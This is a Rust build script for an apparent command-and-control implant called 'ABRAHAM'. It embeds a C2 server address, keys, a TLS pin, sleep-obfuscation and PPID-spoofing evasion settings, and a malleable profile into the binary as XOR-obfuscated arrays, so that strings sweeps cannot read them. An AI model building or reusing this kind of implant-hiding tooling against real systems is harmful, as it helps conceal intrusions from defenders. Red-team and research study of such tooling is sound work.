//! Build-time operational configuration embedding.
//!
//! `ABRAHAM_EMBED=<path>` points at a JSON file with the deployment's
//! configuration:
//!
//! ```json
//! {
//!   "server": "c2.example.com:443",
//!   "key": "<64-hex ed25519 public key>",
//!   "tls_pin": "<64-hex sha256 of the leaf cert DER, or empty>",
//!   "evasion": "ekko,ppid",
//!   "profile": "<inline malleable profile YAML, or empty>"
//! }
//! ```
//!
//! The parsed fields are serialized into a fixed length-prefixed layout,
//! XOR-encrypted with a random keystream generated at build time and
//! emitted as two constant arrays in OUT_DIR. The operational binary
//! therefore contains neither the configuration in plain text nor the
//! command-line flag surface (which only exists behind the `lab-args`
//! feature). No cryptographic strength is claimed for the XOR — it exists
//! so that plain-text strings sweeps do not trivially read the deployment
//! parameters.

use std::env;
use std::fs;
use std::path::Path;

fn main() {
    let embed = env::var("ABRAHAM_EMBED").unwrap_or_default();
    println!("cargo:rerun-if-env-changed=ABRAHAM_EMBED");
    if !embed.is_empty() {
        println!("cargo:rerun-if-changed={embed}");
    }

    let mut fields: Vec<Vec<u8>> = vec![Vec::new(); 5];
    if !embed.is_empty() {
        let text = fs::read_to_string(Path::new(&embed))
            .unwrap_or_else(|e| panic!("ABRAHAM_EMBED {}: {e}", embed));
        let json: serde_json::Value =
            serde_json::from_str(&text).unwrap_or_else(|e| panic!("ABRAHAM_EMBED {}: {e}", embed));
        let str_field = |name: &str| -> String {
            json.get(name)
                .and_then(|v| v.as_str())
                .unwrap_or("")
                .to_string()
        };
        fields = vec![
            str_field("server").into_bytes(),
            str_field("key").into_bytes(),
            str_field("tls_pin").into_bytes(),
            str_field("evasion").into_bytes(),
            str_field("profile").into_bytes(),
        ];
        if fields[0].is_empty() || fields[1].is_empty() {
            panic!("ABRAHAM_EMBED {}: server and key are required", embed);
        }
    }

    // Fixed layout: [u16 len][bytes] per field, five fields in order.
    let mut plain = Vec::new();
    for field in &fields {
        let len = u16::try_from(field.len()).expect("embedded field exceeds u16 length");
        plain.extend_from_slice(&len.to_be_bytes());
        plain.extend_from_slice(field);
    }

    // Build-random xorshift64 keystream, seeded from clock and pid so every
    // build produces a distinct stream.
    let seed = std::time::SystemTime::now()
        .duration_since(std::time::UNIX_EPOCH)
        .map(|d| d.as_nanos() as u64)
        .unwrap_or(0x9E37_79B9_7F4A_7C15)
        ^ ((std::process::id() as u64) << 32)
        | 1;
    let mut state = seed;
    let next = |state: &mut u64| -> u8 {
        *state ^= *state << 13;
        *state ^= *state >> 7;
        *state ^= *state << 17;
        (*state ^ (*state >> 32)) as u8
    };
    let key: Vec<u8> = (0..plain.len()).map(|_| next(&mut state)).collect();
    let cipher: Vec<u8> = plain.iter().zip(&key).map(|(p, k)| p ^ k).collect();

    let mut source = String::from("// @generated by build.rs — do not edit.\n");
    for (name, bytes) in [("CONFIG_CIPHER", &cipher), ("CONFIG_KEY", &key)] {
        source.push_str(&format!("pub const {name}: &[u8] = &["));
        for (i, b) in bytes.iter().enumerate() {
            if i % 24 == 0 {
                source.push_str("\n    ");
            }
            source.push_str(&format!("{b:#04x},"));
        }
        source.push_str("\n];\n");
    }
    fs::write(Path::new(&out_dir()).join("embedded.rs"), source).expect("write embedded.rs");
}

fn out_dir() -> String {
    env::var("OUT_DIR").expect("OUT_DIR")
}
